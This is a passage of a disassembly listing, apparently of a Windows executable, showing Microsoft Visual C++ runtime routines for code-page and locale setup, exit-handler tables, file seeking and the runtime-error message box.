loc_41AD53: ; CODE XREF: sub_41AC36+105�j
test cl, 2
jz short loc_41AD68
or byte_47C741[eax], 20h
mov cl, [ebp+eax+var_318]
jmp short loc_41AD4B
; ---------------------------------------------------------------------------
loc_41AD68: ; CODE XREF: sub_41AC36+120�j
and byte_47C860[eax], 0
loc_41AD6F: ; CODE XREF: sub_41AC36+11B�j
inc eax
cmp eax, esi
jb short loc_41AD30
jmp short loc_41ADBA
; ---------------------------------------------------------------------------
loc_41AD76: ; CODE XREF: sub_41AC36+2D�j
xor eax, eax
loc_41AD78: ; CODE XREF: sub_41AC36+182�j
cmp eax, 41h
jb short loc_41AD96
cmp eax, 5Ah
ja short loc_41AD96
or byte_47C741[eax], 10h
mov cl, al
add cl, 20h
loc_41AD8E: ; CODE XREF: sub_41AC36+176�j
mov byte_47C860[eax], cl
jmp short loc_41ADB5
; ---------------------------------------------------------------------------
loc_41AD96: ; CODE XREF: sub_41AC36+145�j
; sub_41AC36+14A�j
cmp eax, 61h
jb short loc_41ADAE
cmp eax, 7Ah
ja short loc_41ADAE
or byte_47C741[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_41AD8E
; ---------------------------------------------------------------------------
loc_41ADAE: ; CODE XREF: sub_41AC36+163�j
; sub_41AC36+168�j
and byte_47C860[eax], 0
loc_41ADB5: ; CODE XREF: sub_41AC36+15E�j
inc eax
cmp eax, esi
jb short loc_41AD78
loc_41ADBA: ; CODE XREF: sub_41AC36+13E�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop esi
call sub_41A1F6
leave
retn
sub_41AC36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ADC8 proc near ; CODE XREF: sub_41B13B+1A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_429570
call __SEH_prolog
push 0Dh
call sub_418285
pop ecx
and [ebp+ms_exc.disabled], 0
call sub_416E15
mov edi, eax
mov [ebp+var_1C], edi
mov esi, [edi+60h]
mov [ebp+var_20], esi
cmp esi, dword_47C724
jz short loc_41AE1A
test esi, esi
jz short loc_41AE07
dec dword ptr [esi]
jnz short loc_41AE07
push esi
call sub_414A14
pop ecx
loc_41AE07: ; CODE XREF: sub_41ADC8+32�j
; sub_41ADC8+36�j
mov eax, dword_47C724
mov [edi+60h], eax
mov esi, dword_47C724
mov [ebp+var_20], esi
inc dword ptr [esi]
loc_41AE1A: ; CODE XREF: sub_41ADC8+2E�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41AE2E
mov eax, esi
call __SEH_epilog
retn
sub_41ADC8 endp
; =============== S U B R O U T I N E =======================================
sub_41AE2B proc near ; DATA XREF: .rdata:stru_429570�o
mov esi, [ebp-20h]
sub_41AE2B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41AE2E proc near ; CODE XREF: sub_41ADC8+56�p
push 0Dh
call sub_4181F1
pop ecx
retn
sub_41AE2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AE37 proc near ; CODE XREF: sub_41AFCD+9F�p
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, dword_42DEA8
xor eax, [ebp+4]
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_4], eax
push edi
jz loc_41AFAC
xor edx, edx
xor eax, eax
loc_41AE5C: ; CODE XREF: sub_41AE37+36�j
cmp dword_42DEC8[eax], esi
jz short loc_41AEC9
add eax, 30h
inc edx
cmp eax, 0F0h
jb short loc_41AE5C
lea eax, [ebp+var_1C]
push eax
push esi
call ds:dword_4201B0 ; GetCPInfo
cmp eax, 1
jnz loc_41AFA4
push 40h
xor eax, eax
cmp [ebp+var_1C], 1
pop ecx
mov edi, offset byte_47C740
rep stosd
stosb
mov dword_47C844, esi
mov dword_47C720, ebx
jbe loc_41AF92
cmp [ebp+var_16], 0
jz loc_41AF6A
lea ecx, [ebp+var_15]
loc_41AEB3: ; CODE XREF: sub_41AE37+12D�j
mov dl, [ecx]
test dl, dl
jz loc_41AF6A
movzx eax, byte ptr [ecx-1]
movzx edx, dl
jmp loc_41AF5A
; ---------------------------------------------------------------------------
loc_41AEC9: ; CODE XREF: sub_41AE37+2B�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_47C740
rep stosd
lea ecx, [edx+edx*2]
shl ecx, 4
mov [ebp+var_8], ebx
stosb
lea ebx, dword_42DED8[ecx]
loc_41AEE5: ; CODE XREF: sub_41AE37+EB�j
mov al, [ebx]
mov esi, ebx
jmp short loc_41AF14
; ---------------------------------------------------------------------------
loc_41AEEB: ; CODE XREF: sub_41AE37+DF�j
mov dl, [esi+1]
test dl, dl
jz short loc_41AF18
movzx eax, al
movzx edi, dl
cmp eax, edi
ja short loc_41AF10
mov edx, [ebp+var_8]
mov dl, byte_42DEC0[edx]
loc_41AF05: ; CODE XREF: sub_41AE37+D7�j
or byte_47C741[eax], dl
inc eax
cmp eax, edi
jbe short loc_41AF05
loc_41AF10: ; CODE XREF: sub_41AE37+C3�j
inc esi
inc esi
mov al, [esi]
loc_41AF14: ; CODE XREF: sub_41AE37+B2�j
test al, al
jnz short loc_41AEEB
loc_41AF18: ; CODE XREF: sub_41AE37+B9�j
inc [ebp+var_8]
add ebx, 8
cmp [ebp+var_8], 4
jb short loc_41AEE5
mov eax, [ebp+arg_0]
mov dword_47C844, eax
mov dword_47C728, 1
call sub_41ABDE
lea ecx, dword_42DECC[ecx]
mov esi, ecx
mov edi, offset word_47C850
movsd
movsd
mov dword_47C720, eax
movsd
jmp short loc_41AFB1
; ---------------------------------------------------------------------------
loc_41AF52: ; CODE XREF: sub_41AE37+125�j
or byte_47C741[eax], 4
inc eax
loc_41AF5A: ; CODE XREF: sub_41AE37+8D�j
cmp eax, edx
jbe short loc_41AF52
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_41AEB3
loc_41AF6A: ; CODE XREF: sub_41AE37+73�j
; sub_41AE37+80�j
xor ecx, ecx
inc ecx
mov eax, ecx
loc_41AF6F: ; CODE XREF: sub_41AE37+145�j
or byte_47C741[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_41AF6F
mov eax, esi
call sub_41ABDE
mov dword_47C720, eax
mov dword_47C728, ecx
jmp short loc_41AF98
; ---------------------------------------------------------------------------
loc_41AF92: ; CODE XREF: sub_41AE37+69�j
mov dword_47C728, ebx
loc_41AF98: ; CODE XREF: sub_41AE37+159�j
xor eax, eax
mov edi, offset word_47C850
stosd
stosd
stosd
jmp short loc_41AFB1
; ---------------------------------------------------------------------------
loc_41AFA4: ; CODE XREF: sub_41AE37+46�j
cmp dword_47C36C, ebx
jz short loc_41AFBA
loc_41AFAC: ; CODE XREF: sub_41AE37+1B�j
call sub_41AC0D
loc_41AFB1: ; CODE XREF: sub_41AE37+119�j
; sub_41AE37+16B�j
call sub_41AC36
xor eax, eax
jmp short loc_41AFBD
; ---------------------------------------------------------------------------
loc_41AFBA: ; CODE XREF: sub_41AE37+173�j
or eax, 0FFFFFFFFh
loc_41AFBD: ; CODE XREF: sub_41AE37+181�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_41A1F6
leave
retn
sub_41AE37 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AFCD proc near ; CODE XREF: sub_41B11D+B�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 14h
push offset stru_429580
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
push 0Dh
call sub_418285
pop ecx
xor edi, edi
mov [ebp+ms_exc.disabled], edi
mov dword_47C36C, edi
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_41B00A
mov dword_47C36C, 1
call ds:dword_4201AC ; GetOEMCP
jmp short loc_41B035
; ---------------------------------------------------------------------------
loc_41B00A: ; CODE XREF: sub_41AFCD+29�j
cmp eax, 0FFFFFFFDh
jnz short loc_41B021
mov dword_47C36C, 1
call ds:dword_4201A8 ; GetACP
jmp short loc_41B035
; ---------------------------------------------------------------------------
loc_41B021: ; CODE XREF: sub_41AFCD+40�j
cmp eax, 0FFFFFFFCh
jnz short loc_41B035
mov dword_47C36C, 1
mov eax, dword_47C4D0
loc_41B035: ; CODE XREF: sub_41AFCD+3B�j
; sub_41AFCD+52�j ...
mov [ebp+arg_0], eax
cmp eax, dword_47C844
jz loc_41B0FF
mov esi, dword_47C724
mov [ebp+var_20], esi
cmp esi, edi
jz short loc_41B055
cmp [esi], edi
jz short loc_41B065
loc_41B055: ; CODE XREF: sub_41AFCD+82�j
push 220h
call sub_414E7D
pop ecx
mov esi, eax
mov [ebp+var_20], esi
loc_41B065: ; CODE XREF: sub_41AFCD+86�j
cmp esi, edi
jz short loc_41B0E8
push [ebp+arg_0]
call sub_41AE37
pop ecx
mov [ebp+var_1C], eax
cmp eax, edi
jnz short loc_41B0E8
mov [esi], edi
mov eax, dword_47C844
mov [esi+4], eax
mov eax, dword_47C728
mov [esi+8], eax
mov eax, dword_47C720
mov [esi+0Ch], eax
xor eax, eax
loc_41B095: ; CODE XREF: sub_41AFCD+DE�j
mov [ebp+var_24], eax
cmp eax, 5
jge short loc_41B0AD
mov cx, word_47C850[eax*2]
mov [esi+eax*2+10h], cx
inc eax
jmp short loc_41B095
; ---------------------------------------------------------------------------
loc_41B0AD: ; CODE XREF: sub_41AFCD+CE�j
xor eax, eax
loc_41B0AF: ; CODE XREF: sub_41AFCD+F7�j
mov [ebp+var_24], eax
cmp eax, 101h
jge short loc_41B0C6
mov cl, byte_47C740[eax]
mov [eax+esi+1Ch], cl
inc eax
jmp short loc_41B0AF
; ---------------------------------------------------------------------------
loc_41B0C6: ; CODE XREF: sub_41AFCD+EA�j
xor eax, eax
loc_41B0C8: ; CODE XREF: sub_41AFCD+113�j
mov [ebp+var_24], eax
cmp eax, 100h
jge short loc_41B0E2
mov cl, byte_47C860[eax]
mov [eax+esi+11Dh], cl
inc eax
jmp short loc_41B0C8
; ---------------------------------------------------------------------------
loc_41B0E2: ; CODE XREF: sub_41AFCD+103�j
mov dword_47C724, esi
loc_41B0E8: ; CODE XREF: sub_41AFCD+9A�j
; sub_41AFCD+AA�j
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_41B102
cmp esi, dword_47C724
jz short loc_41B102
push esi
call sub_414A14
pop ecx
jmp short loc_41B102
; ---------------------------------------------------------------------------
loc_41B0FF: ; CODE XREF: sub_41AFCD+71�j
mov [ebp+var_1C], edi
loc_41B102: ; CODE XREF: sub_41AFCD+11F�j
; sub_41AFCD+127�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41B114
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41AFCD endp
; =============== S U B R O U T I N E =======================================
sub_41B114 proc near ; CODE XREF: sub_41AFCD+139�p
; DATA XREF: .rdata:stru_429580�o
push 0Dh
call sub_4181F1
pop ecx
retn
sub_41B114 endp
; =============== S U B R O U T I N E =======================================
sub_41B11D proc near ; CODE XREF: sub_41B8DD+9�p
; sub_41B946+D�p ...
cmp dword_47D9B4, 0
jnz short loc_41B138
push 0FFFFFFFDh
call sub_41AFCD
pop ecx
mov dword_47D9B4, 1
loc_41B138: ; CODE XREF: sub_41B11D+7�j
xor eax, eax
retn
sub_41B11D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B13B proc near ; CODE XREF: sub_415D0D+2C�p
; sub_415D0D+A7�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
call sub_416E15
mov eax, [eax+60h]
cmp eax, dword_47C724
jz short loc_41B15A
call sub_41ADC8
loc_41B15A: ; CODE XREF: sub_41B13B+18�j
cmp dword ptr [eax+8], 0
jnz short loc_41B171
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_414670
add esp, 0Ch
jmp short loc_41B1B9
; ---------------------------------------------------------------------------
loc_41B171: ; CODE XREF: sub_41B13B+23�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_41B1B6
push ebx
push esi
mov esi, [ebp+arg_4]
loc_41B17D: ; CODE XREF: sub_41B13B+89�j
mov dl, [esi]
movzx ebx, dl
dec ecx
test byte ptr [ebx+eax+1Dh], 4
mov [edi], dl
jz short loc_41B1BC
inc edi
inc esi
test ecx, ecx
jz short loc_41B1C8
mov dl, [esi]
dec ecx
mov [edi], dl
inc edi
inc esi
test dl, dl
jnz short loc_41B1C2
and [edi-2], dl
loc_41B1A0: ; CODE XREF: sub_41B13B+85�j
test ecx, ecx
jz short loc_41B1B4
mov edx, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_41B1B4: ; CODE XREF: sub_41B13B+67�j
; sub_41B13B+8B�j ...
pop esi
pop ebx
loc_41B1B6: ; CODE XREF: sub_41B13B+3B�j
mov eax, [ebp+arg_0]
loc_41B1B9: ; CODE XREF: sub_41B13B+34�j
pop edi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41B1BC: ; CODE XREF: sub_41B13B+4F�j
inc edi
inc esi
test dl, dl
jz short loc_41B1A0
loc_41B1C2: ; CODE XREF: sub_41B13B+60�j
test ecx, ecx
jnz short loc_41B17D
jmp short loc_41B1B4
; ---------------------------------------------------------------------------
loc_41B1C8: ; CODE XREF: sub_41B13B+55�j
and byte ptr [edi-1], 0
jmp short loc_41B1B4
sub_41B13B endp
; =============== S U B R O U T I N E =======================================
sub_41B1CE proc near ; CODE XREF: sub_41B276+18�p
push esi
push dword_47D9B0
call sub_41E3DD
pop ecx
mov ecx, dword_47D9AC
mov esi, eax
mov eax, dword_47D9B0
mov edx, ecx
sub edx, eax
add edx, 4
cmp esi, edx
jnb short loc_41B241
mov ecx, 800h
cmp esi, ecx
jnb short loc_41B1FE
mov ecx, esi
loc_41B1FE: ; CODE XREF: sub_41B1CE+2C�j
add ecx, esi
push ecx
push eax
call sub_414BBA
test eax, eax
pop ecx
pop ecx
jnz short loc_41B224
add esi, 10h
push esi
push dword_47D9B0
call sub_414BBA
test eax, eax
pop ecx
pop ecx
jnz short loc_41B224
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B224: ; CODE XREF: sub_41B1CE+3D�j
; sub_41B1CE+52�j
mov ecx, dword_47D9AC
sub ecx, dword_47D9B0
mov dword_47D9B0, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov dword_47D9AC, ecx
loc_41B241: ; CODE XREF: sub_41B1CE+23�j
mov [ecx], edi
add dword_47D9AC, 4
mov eax, edi
pop esi
retn
sub_41B1CE endp
; =============== S U B R O U T I N E =======================================
sub_41B24E proc near ; DATA XREF: .data:0042B018�o
push 80h
call sub_414E7D
test eax, eax
pop ecx
mov dword_47D9B0, eax
jnz short loc_41B266
push 18h
pop eax
retn
; ---------------------------------------------------------------------------
loc_41B266: ; CODE XREF: sub_41B24E+12�j
and dword ptr [eax], 0
mov eax, dword_47D9B0
mov dword_47D9AC, eax
xor eax, eax
retn
sub_41B24E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B276 proc near ; CODE XREF: sub_41B2AE+4�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_429590
call __SEH_prolog
call loc_415F49
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_0]
call sub_41B1CE
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41B2A8
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41B276 endp
; =============== S U B R O U T I N E =======================================
sub_41B2A8 proc near ; CODE XREF: sub_41B276+24�p
; DATA XREF: .rdata:stru_429590�o
call sub_415F52
retn
sub_41B2A8 endp
; =============== S U B R O U T I N E =======================================
sub_41B2AE proc near ; CODE XREF: sub_415F5B+3B�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_41B276
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_41B2AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B2C0 proc near ; CODE XREF: .text:loc_4163D5�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_4295A0
call __SEH_prolog
mov [ebp+var_1C], offset dword_429DB4
loc_41B2D3: ; CODE XREF: sub_41B2C0+3C�j
cmp [ebp+var_1C], offset dword_429DB4
jnb short loc_41B2FE
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_41B2F4
call eax
jmp short loc_41B2F4
; ---------------------------------------------------------------------------
loc_41B2ED: ; DATA XREF: .rdata:stru_4295A0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41B2F1: ; DATA XREF: .rdata:stru_4295A0�o
mov esp, [ebp+ms_exc.old_esp]
loc_41B2F4: ; CODE XREF: sub_41B2C0+27�j
; sub_41B2C0+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_41B2D3
; ---------------------------------------------------------------------------
loc_41B2FE: ; CODE XREF: sub_41B2C0+1A�j
call __SEH_epilog
retn
sub_41B2C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B304 proc near ; DATA XREF: sub_415F5B:loc_415F91�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_4295B0
call __SEH_prolog
mov [ebp+var_1C], offset dword_429DBC
loc_41B317: ; CODE XREF: sub_41B304+3C�j
cmp [ebp+var_1C], offset dword_429DBC
jnb short loc_41B342
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_41B338
call eax
jmp short loc_41B338
; ---------------------------------------------------------------------------
loc_41B331: ; DATA XREF: .rdata:stru_4295B0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41B335: ; DATA XREF: .rdata:stru_4295B0�o
mov esp, [ebp+ms_exc.old_esp]
loc_41B338: ; CODE XREF: sub_41B304+27�j
; sub_41B304+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_41B317
; ---------------------------------------------------------------------------
loc_41B342: ; CODE XREF: sub_41B304+1A�j
call __SEH_epilog
retn
sub_41B304 endp
; =============== S U B R O U T I N E =======================================
sub_41B348 proc near ; CODE XREF: sub_418EBA+18B�p
; sub_41B3BC+52�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_41CD1B
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41B369
call sub_419600
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B369: ; CODE XREF: sub_41B348+F�j
push edi
push [esp+8+arg_8]
push 0
push [esp+10h+arg_4]
push eax
call ds:dword_420090 ; SetFilePointer
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41B38A
call ds:dword_420008 ; RtlGetLastWin32Error
jmp short loc_41B38C
; ---------------------------------------------------------------------------
loc_41B38A: ; CODE XREF: sub_41B348+38�j
xor eax, eax
loc_41B38C: ; CODE XREF: sub_41B348+40�j
test eax, eax
jz short loc_41B39C
push eax
call sub_419612
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_41B3B9
; ---------------------------------------------------------------------------
loc_41B39C: ; CODE XREF: sub_41B348+46�j
mov ecx, esi
and esi, 1Fh
sar ecx, 5
mov ecx, dword_47C620[ecx*4]
mov eax, esi
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4+4]
and byte ptr [eax], 0FDh
mov eax, edi
loc_41B3B9: ; CODE XREF: sub_41B348+52�j
pop edi
pop esi
retn
sub_41B348 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B3BC proc near ; CODE XREF: sub_4161C8+69�p
; sub_4164BB+D0�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0041B44B SIZE 0000001C BYTES
push 0Ch
push offset stru_4295C0
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47C618
jnb short loc_41B44B
mov eax, ebx
sar eax, 5
lea edi, ds:47C620h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41B44B
push ebx
call sub_41CD5C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41B41B
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41B348
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_41B432
; ---------------------------------------------------------------------------
loc_41B41B: ; CODE XREF: sub_41B3BC+49�j
call sub_419600
mov dword ptr [eax], 9
call sub_419609
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_41B432: ; CODE XREF: sub_41B3BC+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41B443
mov eax, [ebp+var_1C]
jmp short loc_41B461
sub_41B3BC endp
; =============== S U B R O U T I N E =======================================
sub_41B440 proc near ; DATA XREF: .rdata:stru_4295C0�o
mov ebx, [ebp+8]
sub_41B440 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B443 proc near ; CODE XREF: sub_41B3BC+7A�p
push ebx
call sub_41CDCF
pop ecx
retn
sub_41B443 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41B3BC
loc_41B44B: ; CODE XREF: sub_41B3BC+15�j
; sub_41B3BC+35�j
call sub_419600
mov dword ptr [eax], 9
call sub_419609
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41B461: ; CODE XREF: sub_41B3BC+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41B3BC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B467 proc near ; CODE XREF: sub_4161C8+2B�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+10h]
xor ebx, ebx
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_41B483
mov [edi+4], ebx
loc_41B483: ; CODE XREF: sub_41B467+17�j
push 1
push ebx
push esi
call sub_41B3BC
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_41B504
mov ecx, [edi+0Ch]
test cx, 108h
jnz short loc_41B4A8
sub eax, [edi+4]
jmp loc_41B5C4
; ---------------------------------------------------------------------------
loc_41B4A8: ; CODE XREF: sub_41B467+37�j
mov eax, [edi]
mov edx, [edi+8]
mov ebx, eax
sub ebx, edx
test cl, 3
mov [ebp+var_8], ebx
jz short loc_41B4F5
mov ebx, esi
mov ecx, esi
sar ebx, 5
mov ebx, dword_47C620[ebx*4]
and ecx, 1Fh
lea ecx, [ecx+ecx*8]
test byte ptr [ebx+ecx*4+4], 80h
jz short loc_41B4E7
mov ecx, edx
cmp ecx, eax
jnb short loc_41B4E7
loc_41B4DA: ; CODE XREF: sub_41B467+7E�j
cmp byte ptr [ecx], 0Ah
jnz short loc_41B4E2
inc [ebp+var_8]
loc_41B4E2: ; CODE XREF: sub_41B467+76�j
inc ecx
cmp ecx, [edi]
jb short loc_41B4DA
loc_41B4E7: ; CODE XREF: sub_41B467+6B�j
; sub_41B467+71�j ...
cmp [ebp+var_4], 0
jnz short loc_41B50C
mov eax, [ebp+var_8]
jmp loc_41B5C4
; ---------------------------------------------------------------------------
loc_41B4F5: ; CODE XREF: sub_41B467+50�j
test cl, cl
js short loc_41B4E7
call sub_419600
mov dword ptr [eax], 16h
loc_41B504: ; CODE XREF: sub_41B467+2D�j
or eax, 0FFFFFFFFh
jmp loc_41B5C4
; ---------------------------------------------------------------------------
loc_41B50C: ; CODE XREF: sub_41B467+84�j
test byte ptr [edi+0Ch], 1
jz loc_41B5BC
mov ecx, [edi+4]
test ecx, ecx
jnz short loc_41B525
and [ebp+var_8], ecx
jmp loc_41B5BC
; ---------------------------------------------------------------------------
loc_41B525: ; CODE XREF: sub_41B467+B4�j
sub eax, edx
add eax, ecx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
lea ebx, ds:47C620h[eax*4]
mov eax, esi
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [ebx]
shl esi, 2
test byte ptr [esi+eax+4], 80h
jz short loc_41B5B6
push 2
push 0
push [ebp+var_C]
call sub_41B3BC
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_41B57D
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
jmp short loc_41B573
; ---------------------------------------------------------------------------
loc_41B56A: ; CODE XREF: sub_41B467+10E�j
cmp byte ptr [eax], 0Ah
jnz short loc_41B572
inc [ebp+arg_0]
loc_41B572: ; CODE XREF: sub_41B467+106�j
inc eax
loc_41B573: ; CODE XREF: sub_41B467+101�j
cmp eax, ecx
jb short loc_41B56A
test byte ptr [edi+0Dh], 20h
jmp short loc_41B5B1
; ---------------------------------------------------------------------------
loc_41B57D: ; CODE XREF: sub_41B467+F7�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_41B3BC
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_41B5A4
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_41B5A4
test ch, 4
jz short loc_41B5A7
loc_41B5A4: ; CODE XREF: sub_41B467+12E�j
; sub_41B467+136�j
mov eax, [edi+18h]
loc_41B5A7: ; CODE XREF: sub_41B467+13B�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_41B5B1: ; CODE XREF: sub_41B467+114�j
jz short loc_41B5B6
inc [ebp+arg_0]
loc_41B5B6: ; CODE XREF: sub_41B467+E3�j
; sub_41B467:loc_41B5B1�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_41B5BC: ; CODE XREF: sub_41B467+A9�j
; sub_41B467+B9�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_41B5C4: ; CODE XREF: sub_41B467+3C�j
; sub_41B467+89�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41B467 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B5C9 proc near ; CODE XREF: sub_4162A0+12�p
; sub_4162C5+12�p ...
var_10C = byte ptr -10Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
mov eax, dword_42DEA8
xor eax, [ebp+4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov [ebp+var_4], eax
xor edx, edx
push edi
xor eax, eax
loc_41B5E7: ; CODE XREF: sub_41B5C9+2B�j
cmp ecx, dword_42DFB8[eax*8]
jz short loc_41B5F6
inc eax
cmp eax, 12h
jb short loc_41B5E7
loc_41B5F6: ; CODE XREF: sub_41B5C9+25�j
mov esi, eax
shl esi, 3
cmp ecx, dword_42DFB8[esi]
jnz loc_41B72A
mov eax, dword_47C1F0
cmp eax, 1
jz loc_41B705
cmp eax, edx
jnz short loc_41B626
cmp dword_42D7C4, 1
jz loc_41B705
loc_41B626: ; CODE XREF: sub_41B5C9+4E�j
cmp ecx, 0FCh
jz loc_41B72A
push 104h
lea eax, [ebp+var_10C]
push eax
push edx
mov [ebp+var_8], dl
call ds:dword_420010 ; GetModuleFileNameA
test eax, eax
jnz short loc_41B65F
lea eax, [ebp+var_10C]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_419C40
pop ecx
pop ecx
loc_41B65F: ; CODE XREF: sub_41B5C9+81�j
lea eax, [ebp+var_10C]
push eax
lea edi, [ebp+var_10C]
call sub_4179C0
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_41B6A1
lea eax, [ebp+var_10C]
push eax
call sub_4179C0
mov edi, eax
lea eax, [ebp+var_10C]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_414670
add esp, 10h
loc_41B6A1: ; CODE XREF: sub_41B5C9+AD�j
push edi
call sub_4179C0
push off_42DFBC[esi]
mov ebx, eax
call sub_4179C0
lea eax, [ebx+eax+1Ch]
pop ecx
add eax, 3
pop ecx
and eax, 0FFFFFFFCh
call sub_414800
mov ebx, esp
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push ebx
call sub_419C40
push edi
push ebx
call sub_419C50
push offset asc_4298F0 ; "\n\n"
push ebx
call sub_419C50
push off_42DFBC[esi]
push ebx
call sub_419C50
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebx
call sub_41E453
add esp, 2Ch
jmp short loc_41B72A
; ---------------------------------------------------------------------------
